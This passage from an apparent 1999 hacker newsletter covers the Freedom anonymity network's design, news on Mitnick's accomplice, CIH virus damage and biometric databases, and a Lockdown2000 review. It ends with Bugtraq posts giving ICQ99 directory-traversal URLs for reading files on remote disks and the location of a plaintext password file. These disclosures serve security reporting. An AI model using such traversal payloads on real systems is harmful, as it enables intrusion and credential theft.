Initialization
On start-up, the AIP loads its key cache stored on the local disk, and examines it to see which keys have expired. Each AIP has a list of five topologically neighboring AIPs stored on the
local machine. (During the beta test, this list of neighboring AIPs is manually entered to the Freedom Server Node). A query is then sent to the Network Information Database (NIDB)
server to retrieve a list of encryption keys for the other AIPs in the cloud that may have expired prior to initialization. This query, as all communication between components in the cloud,
is performed using an Anonymous TCP (ATCP) connection.
Establishing Routes to Neighbors
Reading the list of neighbors, the AIP sends "PADDING" packets through UDP to the neighbors. These packets have the same size as payload packets to provide "for free" cover traffic.
The use of PADDING packets and cover traffic introduces the notion of a Heartbeat amongst the AIPs. A heartbeat is defined as the time delay at which a packet must leave the machine
for a specific neighbor, hiding any information of the AIP server's status (idle or busy). The heartbeat concept prevents traffic analysis to a significant degree. Since packets are sent out
on a regular basis, and knowing the rate at which these heartbeat packets arrive at a machine, an AIP can determine if a neighbor is unreachable since it will fail to send an ALIVE packet
after a certain amount of time. PADDING packets further prevent traffic analysis by maintaining a constant data flow between the AIPs. In addition, all data is link encrypted between two
adjacent routers with a shared session key.
Payload Route Creation
The originator of a connection chooses a route to follow through the anonymous cloud. The route consists of a user-definable number of AIP jumps within a system-wide minimum and
maximum of jumps. By imposing a minimum number of jumps, the anonymity of the transaction is guaranteed. The maximum number of jumps is imposed to establish a maximum packet
size. The default number of jumps is three
The route is created with information that includes Anonymous Connection IDs (ACIs), the next AIP hop for the current route, client/AIP symmetric keys, cryptographic algorithms, and
expiry time of the route.
The originator of an anonymous connection has an initial cache of routes to travel through the cloud. This cache is validated and an initial Anonymous TCP (ATCP) connection is made
with an AIP. This selection is a general case of route selection (using a limited subset of AIPs). Next, the client requests a set of routes and signing keys from the AIP it is connected to.
The AIP then sends the routes and signing keys to the client. Once verified, the local routing table is updated. This ensures that as little correlation as possible can be made between the
request for the initial set of routes and the creation of a digital identity (and corresponding route). Requesting these routes from a single source would enable easy monitoring of such
requests. Using the cloud as the source of routes hides this action from observers.
Once the client receives a topological map and a link state table, it can proceed to compute a path from an input to an exit AIP.
Users may choose to activate Freedom's Automatic Route Selection feature, which adheres to the following specification:
For performance reasons, select an entrance AIP "close" to the client, where close is defined as being topologically close. This could potentially reveal
some information, but it is felt that the increased performance is worth the risk of exposure.
Subsequently, the following AIP is selected at random, and may include any available AIP, excluding any previously visited AIPs. This step is repeated
until the final hop is selected.
At route creation time, the first packet uses a public key algorithm to create a session key. The session key is used to encrypt all other packets sent between AIPs for that specific
Anonymous Connection ID (ACI). The payload of the anonymous packet should, at all times, be encrypted when it travels through the anonymous cloud. The only time the payload may
be "in the clear" (i.e.: the session key is decrypted) is once the data exits the anonymous cloud at a Wormhole.
To prevent traffic analysis, the lengths of the packets, are independent of the amount of data inside the packets; padding is added within each packet to ensure this. Route creation
packets are protected against traffic analysis by employing a second size PADDING packet
In order to jump from one AIP to another, the following process occurs:
1.Decrypt link encryption on the header. If the packet contains a CREATE command in the header, the decryption will occur using the AIPs private key. For all subsequent traffic, a
symmetric key is used for link decryption.
2.Process header information. The AIP responds to various header commands that include CREATE (open a path) and DESTROY (close a path). This header information is
different from the header of the packet that is being sent from the client. The header the AIP reads contains added information, such as the nature of the packet, the size of the
message packet, and the amount of padding. In the case of a packet with a CREATE header, the information decrypted from the header would include the following elements:
Forward cryptographic algorithm.
Backward cryptographic algorithm.
The IP address and port number of the next hop.
Expiry time of the route.
A selected number of bits of key seed material to get a symmetric key for the rest of the data.
1.Decrypt/encrypt the rest of the packet information. This is done using the key seed material found from within the CREATE packet header that was decrypted upon arrival at the
AIP. This is used for the forward and backward decryption keys.
2.Take the appropriate action. This includes table update and lookup actions. For example, a table lookup is performed to confirm if the ACI is currently valid; the encryption key
and algorithm are retrieved from the table and applied to the payload (encryption or decryption based on the ACI). A new header is created with the corresponding ACI. The
header is encrypted using the link encryption key and the packet is sent to the next host in the chain.
3.Create new header. A new ACI is selected and the packet is then padded to maintain the packet's size.
4.Encrypt the header with the link encryption key for the next host. The packet is encrypted using the link encryption key of the next AIP in the route.
5.Send the new packet to the next hop in the chain. The packet is released from the AIP and sent to the next one specified in the route.
6.Deliver Data to destination. When the number of jumps has met the number specified by the client, the packet is sent to the Wormhole by the final AIP in the route.
Anonymous Mail Proxy (AMP)
The Anonymous Mail Proxy (AMP) provides for both outgoing and incoming mail delivery services. It accepts email from digital identities and processes the mail by holding it for a
random amount of time and reordering all messages being held at this AMP. After the "holding" time expires, the message is sent from one AMP to another, preserving the anonymous
connection. This is done using the Anonymous Mail Transfer Protocol (AMTP).
The packet format of an AMTP packet has three parts:
Send or Reply Blocks
AMTP to SMTP headers which can change in transit
Message body
This information jumps from one AMP to another with varying levels of details and instructions, depending on which stage of the transfer is occurring.
Before any mail transfer occurs using a digital identity, a public key is created for each identity. The Freedom client then creates up to three reply blocks for each identity. The reply
blocks outline the route that mail packets will follow through the cloud (i.e.: instructions for each AMP, so they know where the packet should be sent after it has been reordered and held
in its queue). Each reply block consists of encryption keys and addresses for three selected AMPs in a specific route. The redundancy of three reply blocks is required in case one of the
AMPs (used in one of the reply blocks) is inoperable. The reply blocks are encrypted with the nymserver's public key and are sent to reside there. Future versions of Freedom will
implement more advanced methods of anonymous mail transport without the need for reply blocks.
Layered encryption is used because the user's real email address resides within the reply block of the digital identity. In a case where a digital identity receives email, the user's real
address should be kept secure until it reaches the last AMP in the return chain (which sends the message to the user's address). Although the final AMP knows the user's real email
address, it must not know the content of the message, the pseudonym under which it was originally addressed, or the origin of the message. Using layered encryption, and a lookup table
within the nymserver, confidentiality can be achieved through the reply blocks.
<img src="http://www.zeroknowledge.com/products/reply_block.gif" border=0></a>
Incoming Email
Once incoming mail arrives for a digital identity, the nymserver looks up the identity's reply block. Each dimension of the reply block consists of three articles:
The next destination in the chain (AMP or real email address)
A symmetric key
The remaining content of the layered reply block.
The nymserver decrypts the reply block with its private key, and reads the next destination AMP, a symmetric key, and the remainder of the layered reply block. The nymserver uses the
symmetric key to encrypt the mail message, then the message and the reply block are sent to the next AMP. This AMP receives the message and the reply block, decrypts its layer of the
reply block to reveal the next destination, and another symmetric key. This new symmetric key is used to encrypt the mail message, and the remainder of the reply block and the mail
message are sent to the next destination. The third AMP receives the message and the reply block. The AMP decrypts the reply block and discovers a destination and a key. The AMP
encrypts the message with the symmetric key. The destination this time, however, is not a AMP, but the user's real email address. Note that, at this point, the AMP does not know where
the original message came from, nor its content because it is multiply encrypted, and the pseudonym is no longer present because the header of the message itself is encrypted and the
reply block is entirely de-layered. The message is sent to the user at the user's email address.
Considering the conditions from the previous Web browsing example, with 3 AMPs denoted A, B, and C, and the real user real@address.ca and the pseudonym mynym@freedom.net,
we get the following:
1.Mail (denoted M) arrives to the Freedom nymserver addressed for mynym@freedom.net. The reply block for mynym (denoted BC) is found within a table. The nymserver can be
considered as being AMP-C.
2.The reply block is decrypted using the nymserver's private key.
3.AMP-C finds itself in possession of the details for the next destination (AMP-C), and a symmetric key, denoted KC. AMP-C encrypts the message with KC (i.e., EKC(M)), and
sends what remains of the reply block, being BB to AMP-B.
4.AMP-B receives the message and the block. AMP-B decrypts the block and finds the next destination details (AMP-A) and a symmetric key, denoted KB. AMP-C performs
EKB(EKC(M)) and sends the message and the remainder of the block, being BA to AMP-A.
5.AMP-A receives the message and the block. AMP-A decrypts the block and finds real@address.ca and a symmetric key, denoted KA; the block is now empty. AMP-A performs
EKA(EKB(EKC(M))) and sends the message to real@address.ca .
6.The user (real@address.ca) receives the message, and performs the necessary decryption and finds itself in possession of the original message M.
Through this process, the digital identity's integrity remains intact, the AMPs in the route are not aware of the message's content, and the mail is received.
Outgoing Email
Using Anonymous Mail Transport Protocol (AMTP), the Freedom client software deposits outgoing mail into a reordering pool at the Freedom Mail Gateway. Currently, there is only one
such pool operated by ZKS. Additional pools are expected in the future.
The digital identity's digital signature is applied to the original message at the client (prior to its multiple encryption), and its integrity is verified by the nymserver before the message is
sent.
The digital identity is not known to any of the AMPs, with the exception of the nymserver. The integrity of the pseudonym is maintained, and the confidentiality of the message headers
is maintained until the Freedom Mail Gateway. Since the digital identity's digital signature is used, the integrity of the message and the sender can be verified prior to its release, thus
ensuring against any impersonation of the digital identity.
Wormhole
The Wormhole is the interface between the anonymous network cloud and Internet hosts accessed by the end user. When a new ACI is presented to the wormhole, the wormhole
assigns a new port for it to pass TCP/UDP traffic. The wormhole, however, does not monitor the state of the TCP connection�the AIP will notify the wormhole that a route has been
destroyed, so the wormhole can release the port-to-ACI map. The wormhole only responds to address requests for its own IP address. Any remaining relevant personal information is
stripped, and the packet goes into the real world of the Internet.
Traffic Shaper
The Traffic Shaper fulfills a dual role as both Internet bandwidth throttle and link padding envelope shaper.
Bandwidth Throttle
Most Freedom Server operators will not be able to dedicate their entire upstream connectivity bandwidth to Freedom. The Bandwidth Throttle settings determine the maximum bandwidth
that will be allocated by the Freedom Server to anonymous Internet connections.
Link Padding Envelope Shaper
Inter-AIP link padding is required to prevent traffic analysis of data passing over AICs. However, the outer bandwidth envelope does not have to continually be operated at the maximum
bandwidth allowed by the Bandwidth Throttle. As long as the outer envelope modulation is kept independent of the data flowing through the link, information leakage will not occur. To
minimize bandwidth costs, the Link Padding Envelope Shaper modulates the outer link envelope as determined by a formula that takes into account historical usage patterns and traffic
flows.
Freedom Client Software
The Freedom Client application runs on the user's computer and acts as a Local Anonymous Internet Proxy (LAIP). The Freedom client provides support and acts as proxy for various
Internet protocols, including
DNS
HTTP
HTTPS
SMTP
POP3
Telnet
SSH
IRC (DCC not supported)
USENET (via a web interface)
The client is, conceptually, an input funnel that anonymizes all Internet traffic before it leaves the client system to the Freedom network. Freedom avoids the trouble of managing the mail
or browsing clients, since it operates at the Winsock, session, and network levels. Freedom monitors outgoing streams and warns the user if it detects the presence of any personal
information. The user then chooses to remove the information or release the message as is.
The Freedom client also acts as a personal data manager. The release of personal data is contextual, based on the source and the active digital identity. A typical example of controlled
information release is when a user wishes to access a mandatory-registration site, but does want to reveal personal information. Using Freedom, the user creates a digital identity to
access the site; a cookie is then created using this user's pseudonymous profile. Whenever the user returns to that site, the same information is read from the cookie, granting the user
access without accidentally revealing sensitive information. The user decides what personal information is divulged and whether it is false or accurate, while the Freedom client's task is
to ensure that this process remains consistent.
Freedom Mail Gateway
The Freedom Client sends all outgoing email to the Freedom Mail Gateway using AMTP. The Freedom Mail Gateway keeps a reordering pool in which emails are kept for a random period
of time before being put into the outgoing message queue. Conversely, incoming email is stored in the reordering pool before being delivered through the AMP chains specified by the
user's reply blocks.
Freedom Network Information Database
The Freedom Network Information Database (NIDB), stores the topological maps of the Freedom network, link performance statistics, and node status information.
Freedom Keyserver
The Freedom Keyserver offers a publicly accessible database containing the public keys of each Freedom Node and of all Freedom identities. Zero Knowledge Systems does not store
and at no time has access to the corresponding private keys of the independent Freedom Server operators or Freedom users. The private keys are generated on and never leave the
individual Freedom Server or the Freedom client software.
Comparison with other proposed Internet Privacy Systems
Mixmaster
Mixmaster is an existing freeware email-only remailer.
Freedom
Mixmaster
Perfect forward secrecy.
Future compromise of the remailer key allows
attacker to decrypt all past traffic
Does not know previous mail hop. Remailer chain
can not be backtracked.
Does know previous mail hop. A legal attacker
may be able to travel up the chain, leading to the
discovery of the email's sender.
Both link and application level anonymizing.
Application level only anonymizing
Onion Routers
Onion Routers are an application proxy based TCP anonymizer proposed by the US Naval Research Laboratory.
Freedom
Onion Routers
Anonymous network payload is IP level. Any
protocol on top of IP can be supported.
Based on application level proxies. Each additional
application requires an additional proxy.
Utilizes end-to-end TCP congestion control
TCP link level encryption causes unnecessary
packet retransmission.
Traffic is encrypted before leaving the client
Traffic in the clear before reaching first node
Bibliography
Ross Anderson, "The Eternity Service", PRAGOCRYPT 96.
ftp://ftp.cl.cam.ac.uk/users/rja14/eternity.ps.Z
Andre Bacard, "Anonymous Remailer FAQ", 1996.
http://www.well.com/user/abacard/remail.html
Douglas Barnes, "The Coming Jurisdictional Swamp of Global Internetworking
(Or, How I Learned to Stop Worrying and Love Anonymity)",
unpublished manuscript, 16 Nov 1994.
http://www.communities.com/paper/swamp.html
David Chaum, "Untraceable Electronic Mail, Return addresses, and
Digital Pseudonyms", Communications of the ACM, February 1981, vol. 24 no. 2.
http://www.eskimo.com/~weidai/mix-net.txt
Lance Cotrell, "Mixmaster & Remailer Attacks", 1995.
http://www.obscura.com/~loki/remailer/remailer-essay.html
Ray Cromwell, "Welcome to the Decense Project", 1996.
http://www.clark.net/pub/rjc/decense.html
Wei Dai, "PipeNet 1.1", 1998.
http://www.eskimo.com/~weidai/pipenet.txt
Arnoud Engelfriet, "Anonymity and Privacy on the Internet", 19 Dec 1996.
http://www.stack.nl/~galactus/remailers/index.html
Ian Goldberg, David Wagner, and Eric A. Brewer,
"Privacy-enhancing technologies for the Internet",
IEEE COMPCON '97, February 1997.
http://www.cs.berkeley.edu/~daw/privacy-compcon97-www/privacy-html.html
Ian Goldberg and David Wagner,
"TAZ Servers and the Rewebber Network: Enabling Anonymous Publishing on the
World Wide Web",
Published in the First Monday electronic journal, vol 3 no 4.
http://www.firstmonday.dk/issues/issue3_4/goldberg/index.html
C. Gulcu and G. Tsudik, "Mixing E-mail with Babel",
Proc. Symp. Network and Distributed System Security, 1996, pp. 2-16.
Andreas Pfitzmann and Michael Waidner,
"Networks without user observability--design options",
EUROCRYPT 85, LNCS 219, Springer-Verlag, pp. 245-253.
Paul Syverson, David Goldschlag, Michael Reed, "Onion Routing,"
http://www.onion-router.net/Publications.html
Glossary
ACI: Anonymous Connection ID
AIP: Anonymous Internet Proxy
AMP: Anonymous Mail Proxy
AMTP: Anonymous Mail Transfer Protocol
ATCP: Anonymous TCP
LAIP: Local Anonymous Internet Proxy
NIDB: Network Information Database
Trademark Notices
Freedom and the Freedom logo are trademarks of Zero-Knowledge Systems Inc.
All other products and company names mentioned herein are the trademarks of their respective owners.
� 1998 Zero Knowledge Systems http://www.zeroknowledge.com
@HWA
08.0 Mitnick's accomplice pleads guilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mitnick's hacker accomplice pleads guilty
By Dan Goodin
Staff Writer, CNET News.com
April 26, 1999, 2:05 p.m. PT
URL: http://www.news.com/News/Item/0,4,35656,00.html
Lewis DePayne, the accomplice to notorious hacker Kevin Mitnick, today pleaded guilty to one count of wire
fraud for his role in a series of computer break-ins that took place over a three-year period, the U.S.
Attorney's office in Los Angeles said.
DePayne, 29, admitted that he took part in a plan to obtain sensitive software from cellular telephone maker
Nokia by posing as a company employee. The count was 1 of 14 brought against him in a 1996 criminal complaint.
DePayne entered his plea in federal court in Los Angeles before Judge Mariana Pfaelzer. Last month
Mitnick pleaded guilty to 5 of 25 counts in the same court.
DePayne's attorney was not immediately available for comment.
DePayne is scheduled to be sentenced July 12. Under a plea agreement, U.S. attorneys will recommend that DePayne
eceive six months' detention, five years of probation, and up to $3,000 in fines, said assistant U.S. attorney
Chris Painter. He also will have to tell investigators and the companies he is accused of defrauding exactly how
he and Mitnick were able to penetrate security systems. DePayne, who lives in Northern California, has been free
on bail, Painter said.
DePayne and Mitnick are known for their ability to hack computer systems and to "social engineer" employees
responsible for security at high-tech companies. When Mitnick was trying use cell phones to break in to computer
systems, he called Nokia posing as an employee and asked that software be sent to him. When that didn't work,
DePayne posed as the fictitious employee's supervisor. Suspecting the requests were a hoax, Nokia recorded the
call and provided investigators with tapes.
Mitnick's exploits made national headlines after his capture was reported in The New York Times and later in
the book Takedown. Mitnick, 39, is accused of breaking in to numerous computer networks, accessing thousands of
credit card numbers, and stealing software between 1992 and 1995.
U.S. attorneys fighting high-tech crime appear to be on a roll. Two weeks ago, investigators tracked down the man
they say posted a bogus Bloomberg story that caused a publicly traded company's stock to surge more than 30 points.
Last week they identified the suspect in a case in which anonymous email that threatened the lives of court
officials was posted on the Internet.
"Our offices and other offices around the country will be investigating when people cause damage to companies,
infrastructure, and proprietary data," said Painter. "These companies ought to have protection."
@HWA
09.0 Biometric Databases?
~~~~~~~~~~~~~~~~~~~~
http://www.wired.com/news/news/politics/story/19338.html
http://www.wired.com/news/print_version/politics/story/19338.html?wnpg=all
DNA Databases Go Too Far
by Declan McCullagh
2:15 p.m. 26.Apr.99.PDT
WASHINGTON -- If Representative Ron Paul has his way, federal agencies will not be able to assemble biometric
profiles of Americans.
The Texas Republican wants to prohibit massive government databases of DNA samples, photographs, and retinal
scans.
"It seems like everywhere you turn there's another government attempt to accumulate more information about us.
This bill will be designed to stop those moves that use government money to set up data banks with DNA and
other identifiers, such as pictures of the retina," Paul said in an interview.
Aides to Paul, who has emerged as a prominent privacy advocate in Congress, drew up the sweeping new bill after
a public outcry arose over federal tax dollars being used to build a national database of driver-license photographs.
The US Secret Service paid Image Data LLC US$1.5 million to develop the database, which has become the target of at l
east two lawsuits since the agency's role became public.
"The fact that this was started with a grant from the Secret Service shows they're moving in that direction," Paul
said. "This whole process smells bad to me, and I thought I'd call attention to it among my colleagues by introducing
this bill."
An early draft of the proposed Privacy Protection Act would prevent the use of Secret Service funds -- or any tax
dollars, for that matter -- to create any database containing biometric information about Americans.
The federal government has recently begun to record more biometric information about Americans. Biometric technology
allows the automatic recognition of a person based on physical characteristics. The Army issues recruits at Fort Still,
Oklahoma stored value cards that require the correct fingerprint to use. The Immigration and Naturalization Service uses
voice-identification technologies at some airports.
The FBI is busy scanning paper fingerprint cards to create digital images and is feeding them into the National Crime
Information Center computer, which the government says receives more than 2 million queries a day. The NCIC database
is already overflowing with information about 32 million Americans, and Attorney General Janet Reno wants to add DNA
samples taken from anyone arrested. A preliminary version of the bill, which Paul hopes to introduce by the end of
the week, would approve databases created by the Social Security Administration, the IRS, the Census Bureau, and the
Department of Veterans Affairs. And prohibition would not apply to the "collection and use of names and Social Security
numbers by the Social Security Administration and the Internal Revenue Service for functions directly related to the
collection of revenue and the administration of the Social Security program."
Paul's staff said that the final version of the proposal would limit the expansion of existing databases.
"The creation of national databases has gone out of control over the last 10 years," said David Banisar, a lawyer at
the Electronic Privacy Information Center. They're "frequently at the instigation of Congress, which has created them
in the name of fighting immigration or welfare fraud or any number of issues. This often happens in secret, with no
public accountability or privacy protections."
Banisar added, "It's a very positive step that Congress is starting to recognize, after all this time, the dangers of
these databases."
But some experts say that the draft may go too far. "It could be too broad. I do think the federal government has a
legitimate role in dealing with interstate cooperation in terms of crime. It seems reasonable to me that the federal
government could fund an interstate crime database project...What about a hospital using federal grant funds to come
up with a database containing medical records about its patients?" asks Eugene Volokh, a law professor at the
University of California at Los Angeles.
Paul also has introduced legislation that would protect financial privacy by getting rid of the so-called Know Your
Customer plan proposed -- and since abandoned -- by banking regulators.
@HWA
10.0 In the wake of CIH...
~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
CIH, Killer or Dud?
contributed by Anonymous
The media frenzy continues although at this point it is hard to tell if CIH was a major infestation or mostly
media Hype. Some reports are claiming ridiculous amounts of damage while others say there was almost
no damage.
Singapore checks in with 150 reported incidents.
Channel New Asia
http://www.channelnewsasia.com/articles/1999/4/26/news1040.htm
ZDNet
http://www.zdnet.com/zdnn/filters/bursts/0,3422,2247380,00.html
South Korea had an estimated 15% or 1 million systems
hit costing the country up to 300 billion won (US$253.86
million) in related repair costs.
A ndover News
http://www.andovernews.com/cgi-bin/news_story.pl?155551/topstories
CIH hits 12 of 60 brokerage houses in Malaysia. The infections did not hinder the performance of Malaysia's
benchmark stock index.
International Herald Tribune
http://www.iht.com/IHT/TODAY/TUE/FIN/wirus.2.html
Many government offices wiped out in Turkey. Private banks, police departments, an army school, state TRT
television, Title Deeds and Land Survey office and state-owned Kalkinma Bank where some of the places
hit.
CNN
http://customnews.cnn.com/cnews/pna.show_story?p_art_id=3663070&p_section_name=On+Target&p_art_type=1460518
Most damage relegated to Asia and Europe. Data Fellows reports damage in Hong Kong, Singapore, India,
Finland, New Zealand, Britain, Sweden, Japan, and Malta.
C|Net
http://www.news.com/News/Item/0,4,0-35632,00.html?st.ne.fd.mdh.ni
CIH hits Boston College hard, students lose a semesters worth of work. MSNBC says that while there where
pockets of infections most people where unaffected.
MSNBC
http://www.msnbc.com/news/262104.asp
Austrailia says 'No Meltdown"
Australian Broadcasting Corporation
http://www.abc.net.au/news/newslink/weekly/newsnat-27apr1999-42.htm
While no where near as widespread as Melissa, CIH was much more deadly.
Nando Times http://www.techserver.com/story/body/0,1634,42451-68484-495994-0,00.html
PC World http://www.pcworld.com/pcwtoday/article/0,1510,10717,00.html
Wired http://www.wired.com/news/news/technology/story/19334.html
CIH turned out to be no big deal with minimal damage.
Detroit Free Press http://www.freep.com/tech/qvirus27.htm
The Akron Beacon Journal http://www.ohio.com/bj/business/docs/026278.htm
10.1 CIH 1.2 Virus Hits Few
~~~~~~~~~~~~~~~~~~~~~~
Only a small number of PCs get blasted by the
"Chernobyl" virus.
by Reuters
April 27, 1999, 4:32 a.m. PT
The CIH 1.2 ("Chernobyl") virus hit computers around
the world on Monday, wiping out data on hard drives
and even causing some PCs to fail when starting up,
computer experts said.
Although the virus hit only a tiny fraction of the number
of machines affected by the recent Melissa virus, the
new bug's bite was much more deadly for an
unfortunate few.
"I've talked to people who, literally, were crying on the
telephone--a woman whose poetry book was almost
done and was completely lost, a man whose doctoral
dissertation was lost. They were devastated," said
Mikko Hermanni Hypponen, of computer security firm
Data Fellows in Helsinki.
The worst damage appeared to be taking place in Asia
and parts of Europe, where antivirus protection is less
prevalent, and with pirated software, which is often filled
with bugs.
Data Fellows reported damage in Hong Kong,
Singapore, India, Finland, New Zealand, Britain,
Sweden, Japan and Malta, with hundreds of machines
already being hit even before the United States opened
for business. The bulk of the computers affected were
in Asia, Data Fellows said.
A Handful Hit
Carnegie Mellon University's Computer Emergency Response Team said it knew of only a few dozen
computers hit by the virus. "It really hasn't been that bad," said a CERT case worker.
But the Chernobyl virus's limited impact did little to console those who were infected. DataFellows'
Hypponen said that the cost of repairs could run into the millions of dollars. "Unlike Melissa, this is causing
real problems and serious loss of data for some people," he said.
CERT said that data "may be unrecoverable" if the virus hits, and software needs to be reinstalled from the
ground up to make computers work again, a task beyond the expertise of most home computer users.
"I just turned on the doggone thing and the screen was almost totally black--it said 'os load in progress' and
then it said 'insert bootable media in appropriate drive,' said one person hit by the virus, Christina Asksomitas
of Palm Beach Country, Florida. "We tried to reboot it but nothing works."
The virus struck the campus of Boston College in Chestnut Hill, Massachusetts, shortly after midnight on
Monday, wiping out the hard drives of about 100 students, many of whom were preparing term papers,
school spokesperson Jack Dunn said.
Virus Hits Monthly
Computer experts said users could avoid the virus by not booting up their computers Monday, or resetting
the date, since the virus is activated when computer utility systems hit the twenty-sixth of each month.
While the virus has been hitting on the twenty-sixth day of each month since last year, this month's version was
expected to be the most prevalent and dangerous. The April CIH virus is called the Chernobyl virus because it's
timed to go off on the anniversary of the Soviet nuclear accident, one of technology's worst disasters.
Up-to-date antivirus software will spot the virus, and many corporate computers have recently upgraded
their protection because of the Melissa scare.
Copyright � 1999 Reuters Limited
@HWA
11.0 Lockdown2000 review by BHZ
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
INTRO
We live on the edge of this millennium. Computers are become to people
what TV sets were before few decades. Main things that we want on
the Internet is privacy and security. Security is always tested
with some new bugs, flaws and vulnerabilities. So we must be always
secured. Most of the Windows95 users, are targeted by some trojans.
DEFINITION OF TROJAN
Trojans could be defined on this ways:
An unauthorized program contained within a legitimate program. This
unauthorized program performs functions unknown (and probably unwanted)
by the user.
A legitimate program that has been altered by the placement of
unauthorized code within it; this code performs functions unknown (and
probably unwanted) by the user.
Any program that appears to perform a desirable and necessary function
but that (because of unauthorized code within it that is unknown to
the user) performs functions unknown (and probably unwanted) by the
user.
LOCKDOWN2000
There are many solutions for securing yourself from trojans. From
monitoring your registry to some commercial and non commercial programs.
I think that best program I have used in trojan detection is
Lockdown2000.
The main thing in good anti-trojan cleaners is that they can be
upgradeable. The staff behind Lockdown2000 is always on alert, so
you can download newest trojan definitions from their website.
Lockdown2000 sits in your system tray and it scans your computer
in time interval that you enter. It has two modes - Scan for unknown
trojans and Background scan for trojans. Ok so this is a lifesaver
option. It monitors your registry and some system files for new
entries. When some change is made, you are being automatically alerted,
and now you can acknowledge that this string or file will be deleted
or not. It helped me when I was downloading and checking some files
from a trusted host, and in one moment something beeped and
Lockdown2000 window opened. It detected a file which tried to add
its string to the start directories in registry. I prompted that I
don't want to keep this file, and it was immediately deleted. I
later looked more into that file, and it was modified version of
Back Orifice. I deactivated Lockdown2000 and installed that trojan
(LM BO.LEENTech), and scanned my computer with some other trojan
cleaners, and it wasn't found. So trojan cleaner and registry monitor
in one program is winning combination. This current trojan signature
file has 88 trojan definitions in it. So my opinion is that this is
very impressive number.
Lockdown2000 has even more quality functions:
Port sniffer
It listens some ports on your computer, which are used to be connected
on with trojan client program.
TraceRoute
Ok so someone pinged (sent you tcp packets and waits for reply if
port is open) you on some trojan-used port. Lockdown2000 gives you
his IP address. Now with TraceRoute you can trace the "attacker",
to his Internet Service Provider, and you can report him to admins
WhoIs
Very useful because you don't have to connect Internic (or some other
domain seller - yes Internic lost monopoly on it), because you can
do it from program who is always close to you - in your system tray.
File Sharing
File and Print sharing was very popular intrusion method some months
ago when it was reported by Rhino9, and Legion software (scans for
"open" computers) was produced. If you have some disk partitions
which must be opened to just a group of people, you just use
Lockdown2000 and put a password on the share.
LOCKDOWN2000 INFO
Program name: Lockdown2000 v.2.5.4
Website : http://www.lockdown2000.com
Tech support : support@lockdown2000.com
BHZ
bhz@net-security.org
http://net-security.org
@HWA
12.0 ICQ99 Vulnerabilities and Exploits
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sun, 25 Apr 1999 22:46:02 +0400
From: delta <x-delta@USA.NET>
To: BUGTRAQ@netspace.org
Subject: ICQ 99 Password
Hi! I find that icq 99 stored password in open text in file
ICQ\NewDB\uin#.dat
try open it with note pad , hit search and enter your password .
Password always placed in the end of line "iUserSound"
Thanx!
----------------------------------------------------------------------------
Date: Mon, 5 Apr 1999 23:50:56 +0200
From: Jan Vogelgesang <wj.Vogelgesang@SAARBRUECKEN.NETSURF.DE>
To: BUGTRAQ@netspace.org
Subject: security hole in ICQ-Webserver
Hi,
Some days ago i've read a message here in Bugtraq from Ronald A. Jarell
about a vulnerability in the ICQ-Webserver . I tried to reproduce this
vulnerability with my computer (win95) and find out the following:
-sending any non-http stuff or even a simple "get" (without any other
characters however) crashes the ICQ-Client. This works with ICQ99a V2.13
Build 1700, but not with Build 1547.
Moreover, there is a much bigger hole in the ICQ-Webserver: If you have
the webserver enabled, everyone can access your complete(!) harddisk
with a simple webbrowser. When your page is activated and you are online,
each request to "http://members.icq.com/<your ICQ-Number>" will be
redirected to your computer. Thus, every visitor get to know your current ip.
Nevertheless, only the files in "/ICQ99/Hompage/<your ICQ-Number>/personal"
should be accessible. But a visitor can "climb up" the directory tree with
some dots, e.g. "http://<yourIP>/...../a2.html" would present him the file
"a2.html" in the "ICQ99" directory. With some more dots, he would come to
the root-directory of your harddisk. But there is one barrier: The
ICQ-Webserver only delivers files with a ".html" extension. After some
experiments I found a way to trick it out: I add ".html/" to the URL and
the Webserver sends every file I request. For instance,
"http://<yourIP>/............./config.sys" won't work, but
"http://<yourIP>/.html/............./config.sys" would.
I have test this both with Build 1700 and with Build 1547.
In my opinion, this is a significant security problem, because password
files or even the registry in the windows directory can be read.
I warned Mirabilis about it and hope they will informe the ICQ-community.
sorry for my poor english...
Jan Vogelgesang
-------------------------------------------------------------------------------
Date: Thu, 8 Apr 1999 08:45:48 -0400
From: "[iso-8859-1] Jos� Reyes Cede�o" <jreyes@CEIS.ISPJAE.EDU.CU>
To: BUGTRAQ@netspace.org
Subject: Re: ICQ Webserver bug
>Well, my box was win 98, and the remote box I tested it against was
>win 95. Didn't have anyone running NT handy to test against. However,
>another person I corresponded with who was testing this did get it to
>drop a 95 box, but not every time. Did it every time for me; but there's
>apparently other factors that contribute as well.
>
>--
>Ron Jarrell
>VA Tech Computing Center
I try to test this on my NT box ( NT server 4.00.1381, Sevice pack 3 ) and I
could not reproduce the error. I've used ICQ Version 99a Beta v.2.13 Build
1700. It would be beneficial if Ron Jarrell or Jan Vogelgesang, explained
the procedure that they carried out to arrive to the error detailedly.
Best regards, Jose.
-------------------------------------------------------------------------------
Date: Thu, 8 Apr 1999 19:35:35 +0000
From: sven@MSC-MEDIA.COM
To: BUGTRAQ@netspace.org
Subject: Re: security hole (READ AS: security chasm) in ICQ-Webserver
On 8 Apr, DaChronic wrote:
> I can confirm this with Win9x but not with WinNT 4.0 sp3 and hotfixes
> nor sp4 (can anyone else?). ..........
As it was discussed some time ago in this list
the 'more than 2 dot' feature is not working with NT.
But it is definitely working with 95/98.
Maybe replacing /.../ with /../../ will work ?
CU Sven
-------------------------------------------------------------------------------
Date: Thu, 8 Apr 1999 18:08:06 -0700
From: Scott <smc@visuallink.com>
To: BUGTRAQ@netspace.org
Subject: Re: ICQ Webserver bug
I'm using Win98/4.10.1998 w/ ICQ Version 99a Beta v.2.13 Build #1700
I could crash my ICQ webserver and read files remotely. When I have tried
this on other computers, it only works some of the time, sometimes it
returns "Forbidden" when I try to crash it or d/l files
-------------------------------------------------------------------------------
Date: Thu, 8 Apr 1999 19:30:18 -0400
From: Kaven Rousseau <rousseau@GLOBETROTTER.QC.CA>
To: BUGTRAQ@netspace.org
Subject: Re: ICQ Webserver bug
At 08:45 1999-04-08 -0400, you wrote:
>>Well, my box was win 98, and the remote box I tested it against was
>>win 95. Didn't have anyone running NT handy to test against. However,
>>another person I corresponded with who was testing this did get it to
>>drop a 95 box, but not every time. Did it every time for me; but there's
>>apparently other factors that contribute as well.
>>
>>--
>>Ron Jarrell
>>VA Tech Computing Center
>
